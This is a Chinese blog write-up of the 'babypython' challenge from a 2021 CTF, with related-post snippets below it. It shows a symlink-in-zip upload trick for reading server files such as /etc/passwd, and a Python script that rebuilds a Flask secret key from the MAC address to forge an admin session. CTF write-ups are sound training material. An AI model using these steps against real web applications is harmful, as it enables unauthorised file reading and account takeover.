2021 DASCTF八月挑战赛

最新推荐文章于 2024-05-01 03:04:52 发布
最新推荐文章于 2024-05-01 03:04:52 发布
阅读量2.7k 收藏 9
点赞数 3
分类专栏: 安恒月赛 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/120005663
版权

babypython[国赛总决赛复现]

看着像是[HCTF 2018]Hide and seek 这题改的,和[CISCN2019 华东南赛区]Web4的加密SECRET_KEY的方式也一样
在这里插入图片描述

进去提示要变admin,想到session伪造,直接jwt.io伪造不了,需要SECRET_KEY。上传文件只能为zip ,软链接zip 读取文件。

ln -s /etc/passwd passwd
zip --symlinks passwd.zip passwd

读取/proc/self/environ提示bad bad hack就会重定向到index?error=1页面,读取/app/app.py无果 尝试/app/main.py 以及 /app/uwsgi.ini(看之前题目的wp猜的,感觉应该懒得去改这个)
在这里插入图片描述
在这里插入图片描述

还是不知道具体代码在哪,直接根据之前题目的加密方式打
app.config[‘SECRET_KEY’] = str(random.random()*100)
random.seed(uuid.getnode()),设置随机数种子操作。
python random生成的数是伪随机数
uuid.getnode(),这个函数可以获取网卡mac地址并转换成十进制数返回
通过读/sys/class/net/eth0/address文件得到mac地址,于是构造软链接、生成zip、上传看返回结果。

import uuid
import random

mac = "02:42:ac:10:8c:9f"
temp = mac.split(':')
temp = [int(i,16) for i in temp]
temp = [bin(i).replace('0b','').zfill(8) for i in temp]
temp = ''.join(temp)
mac = int(temp,2)
random.seed(mac)
randStr = str(random.random()*100)
print(randStr)

flask-session-cookie-manager-master伪造session

在这里插入图片描述

带着伪造admin的session去访问,就给flag了
在这里插入图片描述

寒王’sblog

根据提示用工具即可,但图片不是头像,在gitee里面。。。。。我说咋没东西
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
别的没做出来,看完wp再补

Arnoldqqq
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-DASCTF八月挑战赛
Yasso的博客
09-01 1500
babypython[国赛总决赛复现] 是个上传界面,经测试只能上传zip文件 看到页面提示,猜测只有admin才能得到flag,需要伪造session,伪造session要用到一个工具-flask-unsign 所以这道题关键是需要找到key. 可以上传zip文件,同时后台自动解压的情况下,从而实现任意文件读取。 软连接导致任意文件读取 我们可以压缩一个软链接,类似于windows下的快捷方式,然后网站后台会解压读取该软链接指向的服务器上的文件,就能达到读取任意文件的效果。 ln -s /etc/pas
2023羊城杯 DASCTF EZ-Misc
09-03
2023羊城杯 DASCTF EZ-Misc
BUUCTF 加固题 babypython WriteUp
柠檬i的博客
12-06 1061
主要用了secrets模块加固,提供较安全的随机数,防止伪造session
文件任意读取和强碰撞
qq_53142368的博客
08-31 1908
文章目录一、babypython[国赛总决赛复现]考点:硬链接读取任意文件、伪造session二、BUUCTF-[安洵杯 2019]easy_web总结 一、babypython[国赛总决赛复现] 考点:硬链接读取任意文件、伪造session 这个题当时打开是一个文件上传 然后上传一个文件 显示需要上传zipfile,当时用bp拦截 改zip 上传成功后 没有回显文件的路径 然后就卡住了 后来发现这个题考点是 硬链接读取任意文件 伪造session ln -si /app/y0u_found_it.i
2024年Python最全我用Python抓取了【S11全球总决赛】直播评论,EDG nb(2)
最新发布
2301_82242351的博客
05-01 859
找到你需要采集的视频地址(EDG牛逼!!!!爬虫采集数据首先要找到对应的数据目标地址,可以明显看出当前的网页的评论数据是在不断变化的,需要找到对应的评论接口,习惯性的去找动态数据。数据并没有在动态数据里,清空数据加载新的评论数据,触发加载条件。加载的数据在all里,明确数据之后就好处理了,获取到对应的网页接口,通过requests发送网络请求。​。
[柏鹭杯 2021]baby_python
liaochonxiang的博客
03-19 304
可见核心代码在baby_core.pyc中,也就是在baby.exe_extracted\PYZ-00.pyz_extracted\baby_python中。pyinstxtractor解包,发现需要python3.7本版,不然解出来了,会发现PYZ-00.pyz_extracted文件夹中什么也没有。会有许多报错,也是正常的,因为PYZ-00.pyz_extracted目录下的文件被加密了。baby_python\baby_core.pyc.encrypted也是被加密的。接下来写个文件解密脚本。
2023年第三届陕西省大学生网络安全技能大赛之babypython
qq_41853048的博客
06-07 233
第一题做的挺快的,直接动态调试转伪代码就出了,然后接下来就一直坐牢了,babypython本来听说gpt4可以直接输入上万行分析,结果感觉和gpt3的差距也不大,字节码太多了,无从下手😥。
baby python
2301_79935671的博客
03-25 539
原题wp参考链接:https://www.cnblogs.com/karsa/p/13529769.html。伪造,直接jwt.io伪造不了,需要SECRET_KEY。ssh连上查文件/app/y0u_found_it/y0u_found_it_main.py。解题思路是软链接zip读取文件,然后伪造admin的session读取flag。所以用软连接读取/sys/class/net/eth0/address。首先下载secrets模块,secrets模块可以提供比较强的随机数。导入secrets模块。
DASCTF Oct X 吉林工师 欢迎来到魔法世界~ (1).zip
12-07
DASCTF 吉林工师 欢迎来到魔法世界 ctf 真题
Ant & SVN task script
11-17
it's very article which introduece svn task work with ant script in your project.
安恒_务实的网络安全.pdf
08-15
【网络安全实践与业务安全】 ...面对网络安全的挑战,企业需要从高层领导到基层员工全员参与,建立明确的战略、规范的操作流程和有效的应急机制,同时不断学习和适应新的安全威胁,才能在数字化的世界中保持安全。
baby-python-steps:idk男人我正在尝试python
03-09
婴儿Python步骤 这是我第一次尝试python idk男人他妈的python wtf是这个狗屎
第十届蓝桥杯嵌入式国赛全国总决赛赛题暨经验分享
01-04
本资源包中的赛题于2019年从北方工业大学赛点现场拷贝取得。资源包还包括个人经验分享与行程安排。若需要参赛指导或推免经验分享可私信交流。
自动提交flag到指定服务器python脚本
05-12
自动从txt读取flag并提交指定平台python脚本,AWD比赛专用,可以自定义内容,批量提交等,确保速度
2021CISCN-Re-baby.bc
m0_51713041的博客
06-19 318
baby.bc 1. Ready 先判断其文件类型: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-t7JSTYOi-1624085083834) 显然这个一个二进制的字节码文件,我们可以将它转化为.s的汇编文件,然后再转化成可执行文件拖入IDA进行分析 llc baby1.bc -o baby.s //得到IR汇编 as baby.s //转化为可执行文件 在对应文件夹中会出现一个a.out的可执行文件 2
[CISCN 2021] 部分 write up
Anton__1的博客
05-16 789
easy_source 抓包扫目录干都干了,发现什么都拿不到 预期猜测flag在注释里(也给了提示): 你能发现我嘛 所以我们可以试着用PHP内置类中的ReflectionMetho来读取类中函数的注释: 参考自https://r0yanx.com/2020/10/28/fslh-writeup/ payload如下: ?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment 因为不知道到底在那个函数中,随即手工爆破直到拿到flag
python 小游戏500行以内_README.md
weixin_39610468的博客
12-16 164
教孩子学习Python编程基础学习背景女儿8岁,学习优秀,可以熟练的恢复三阶魔方,会画画舞蹈,键盘盲打英文每分钟30-40字符。爸爸,8年编程经验。目标:结合孩子的实际情况以及自己的编程能力来策划这次编程学习课程。这是针对自己孩子的Python启蒙编程类型的课程,根据最终的学习目的,所以对学习内容作了取舍,抛弃了Python中的一些进阶内容,保留了最最常用的基础内容进行讲解,力求做到讲解和范例通俗...
[柏鹭杯 2021]baby_python-----day2
Joyce_hjll的博客
03-15 317
发现主函数在baby_core里,于是就找baby_core文件,但是找了半天没找到,而且发现PYZ-00.pyz_extracted文件夹中竟然是空的!,下图是用python3.7反编译后的PYZ-00.pyz_extracted文件夹。在其中找到同名文件baby.pyc,然后将其转换为py代码(在这里用的是pycdc)这次就很反编译出来很多文件,但cmd中的信息告诉我们许多文件其被加密过。baby_core在第一个文件夹baby_python中。得到baby.exe_extracted文件夹.
[CTF] BUUCTF系统加固题 → Ezsql
ZXW_NUDT的博客
12-09 5762
小声说:这可能是全网唯一一个Writeup 接下来讲讲具体咋做 第一步:肯定是用KALI上ssh登一下 然后找到index.php这个文件 接着查看文件里面的内容,最好是复制到VSCode上改完再粘贴回去 index.php文件内容如下: <!DOCTYPE html> <html lang="zh"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible"
2022dasctf x su 三月春季挑战赛
03-16
非常感谢您的关注和参与,2022年的DASCTF x SU三月春季挑战赛将会是一场精彩的比赛。我们将会为参赛者提供丰富多彩的挑战,让大家可以在比赛中不断提升自己的技能和能力。希望您能够积极参与,共同创造一个充满挑战...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值